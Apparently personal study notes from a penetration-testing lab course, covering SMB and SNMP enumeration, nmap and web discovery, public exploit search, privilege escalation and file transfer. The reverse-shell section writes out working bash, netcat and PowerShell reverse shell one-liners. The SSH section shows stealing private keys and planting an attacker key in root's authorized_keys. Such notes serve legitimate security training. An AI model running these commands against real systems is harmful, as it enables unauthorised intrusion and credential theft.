2. Getting Started
Risk Management
Data protection on policy without negatively affecting org
Identify: Legal, environmental, market, regulatory, etc...
Analyze: Determines impact, probability. Mapped to policies, procedures, processes
Evaluate: Org decides to accept unavoidable, avoid (change plans), control (mitigate) or transfer risk (insure)
Deal: Eliminate as possible. Interfacing with stakeholders
Monitor: Situational changes that could change impact, from low-medium-high impact
Handy Cmds:
netstat -rn // show accessible networks w/vpn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.1.2 0.0.0.0 UG 0 0 0 eth0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
Services
Server Message Block:
SMB allows users, admins to share folders, make them accessible
A tool that can enum with SMB shares is smbclient
-L
Retrieve list of avail shares on remote host-N
Suppress passwdget file.txt
Download a file
#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares
smbclient \\\\10.10.10.0\\users # connect to SMB share
smbclient --no-pass -L //10.10.10.1 # null user
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # use NT hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session to share
#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # scan snmp on ip
snmpget -V # what version is running locally?
#handy OID's to know
1.3.6.1.2.1.1.1.0 # system description
1.3.6.1.4.1.77.1.2.25 # win usrs
1.3.6.1.2.1.25.4.2.1.2 # running procs
1.3.6.1.2.1.2.2.1.2 # int name
1.3.6.1.2.1.6.13.1.3 # open tcp ports
1.3.6.1.2.1.25.6.3.1.2 # software
1.3.6.1.2.1.25.2.3.1.4 # storage units
1.3.6.1.2.1.4.35 # nat table
1.3.6.1.2.1.4.21 # ip route table
1.3.6.1.2.1.31.1.1.1 # wireless table
#other
onesixtyone -c brute.txt 10.10.10.1 # brute force snmp secret
enum4linux -a # enum4linux scan
Tmux primer by ippsec
Vim Primer
Netcat: Win: netcat | Win alt: PowerCat socat Features nc doesn't have (fwding ports, connecting to serial devices)
Can also be used to upgrade a shell to a full TTY
Standaloin of socat: Can xfer to a system after RCE to get more stable revshell
#tmux
ctrl +b # default prefix
prefix c # new window
prefix 1 # swap to window 1
prefix + shift + % # split vertically
prefix + shift + " # split horizontally
prefix + -> # swap to right pane
#vim
esc + i # insert mode
esc # normal mode
x # cut char
dw # cut word
dd # cut line
yw # cp word
yy # cp line
p # paste
:1 # go to line 1
:w # write file 'save'
:q # quit
:q! # save/quit
nmap
#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/critrix # list nmap scripts
ls /usr/share/nmap/scripts | snmp # also lists nmap scripts
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run nse script
nmap --script=banner -p 80 10.10.10.1 # banner grab
#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: CEO-PC
| NetBIOS computer name: CEO-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-27T00:59:46+00:00
#netcat
nc 10.10.10.1 # banner grab
sudo apt install seclists -y # install seclists
Web Enums
Additional functionality, such as enum public AWS S3 buckets
Add a DNS Server such as 1.1.1.1 to /etc/resolv.conf
EyeWitness/Aquatone can be used to take screens of targets, fingerprint, and id for default creds
Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use
Viewing cert reveals details: Programs like
testssl.sh
andsslscan
are great for thisEmail/company name could be used to conduct a phishing attack if in scope
robots.txt
Common for sites to contain:Tells engines/crawlers like Googlebot which resources can/can't be accessed for indexing
Can provide location of private files/admin pages
Source Code: Worth checking source code for any pages
#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt #dir scan
gobuster dns -d site.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt #subd
feroxbuster -x php -u http://10.10.10.1 # look for php in search
dirsearch -u http://10.10.10.1
curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # banner grab
whatweb --no-errors 10.10.10.1 # web server/cert details
ctrl +U # view page source in browser
Virtual Machines
Hyper-V on Windows
Virtual machines on bare metal hypervisors such as Proxmox or VMware ESXi
Hypervisors: VirtualBox, or VMware Workstation Player on Windows/Linux
VMware Workstation, requires a paid license but offers many features Hypervisor: Allows us to create/run VMs: Enables us to use host to run VMs by virtually sharing mem/resources
Run isolated from primary OS, which offers isolation/protection
Folder Structure: Have clear folder structure on machine to save data
moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
├── EPT (External Pentest)
│ ├── evidence
│ │ ├── credentials
│ │ ├── data
│ │ └── screenshots
│ ├── logs
│ ├── scans
│ ├── scope
│ └── tools
What's a shell?
A program that takes input from user and passes cmds to OS for tasks
bash was originally Unix's sh, and others like zsh, tcsh, ksh, etc.. exist
Shell Types
Initiates connection back to a listener on our attack box
Public Exploits
sudo apt install exploitdb -y
searchsploit openssh 7.2
Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vuln Lab
Metasploit Framework: Contains built-in exploits of public vulns
Recon scripts enum hosts, compromised targets
Verification scripts validate vulnerabilities without hacking it
Meterpreter -Connect to shells, run cmds on hacked targets
Post-exploit/pivot tools
Reverse Shell Commands
Cmd we exec depends on OS a compromised host runs: What apps/cmds we can access
Payload All The Things: Comprehensive list of revshells we can use
Certain cmds are more reliable: Can be attempted to get a reverse connection
bash -c 'bash -i >& /dev/tcp/x.x/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Once cmd loses connection: Have to rerun exploit for access
Privilege Escalation
HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker,
dkpg -l # see what software is installed
C:\Program Files # see what software is installed windows
find / -perm -u=s -type f 2>/dev/null # find all perms with s
sudo -l # check what sudo privs we have
User Privileges
Allows a user to exec cmds as a diff user: Lower priv users to exec cmds as root without access
GTFOBins List of cmds/how they can be exploited through sudo
LOLBAS List of Win apps leverage, like downloading files/exec cmds
Scheduled Tasks
Cron jobs: Form of scheduling tasks with specific dirs we utilize to add jobs: Need right perms
1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root
If we can write to a dir called by a cron job: should send us a shell when exec
Exposed Credentials Common config files, logs, user history (bash_history/PSReadLine in Win)
SSH Keys If we have read access over .ssh dir for a specific user
We might be able to read priv ssh keys in
/home/user/.ssh/id_rsa
or/root/.ssh/id_rsa
and use that to log inIf we can read the
/root/.ssh/
dir, we can cp it to our machine using-i
cat /home/user/.ssh/id_rsa or cat /home/root.ssh/id_rsa
vim id_rsa
chmod 600 id_rsa # changes perms to be more restricetive:
# lax perms means ssh server could prevent them from working
ssh [email protected] -i id_rsa
If we see write access to a user
/.ssh/
dir, can place our public key in the dirSSH config won't accept keys written by other users, so works if we have control over them
cat /home/user/.ssh/authorized_keys
ssh-keygen -f key # create new key, -f output file
# 2 files created
1. key (we use this with ssh -i)
2. key.pub # we copy this to the remote machine
# cp key.pub onto the remote machine
# add it to /home/root/.ssh/authorized_keys
echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this and all we're doing here is appending it to the file
ssh [email protected] -i key
Transferring Files Python HTTP server on our machine and wget
/cURL
to download files
cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server
wget http://10.10.14.1:8000/linenum.sh # has to be in the same dir listed - dl
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh
# specify local file w/scp, remote dir saved
Base64 base64 encode the file into b64
, paste the str on the remote server, decod
base64 shell -w 0 # xsfer bin file shell, b64 encode it
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU
echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy b64 str, go to remote host: use b64 -d to decode and pip to file
file shell # validate file format
md5sum shell # check md5sums of both files
Last updated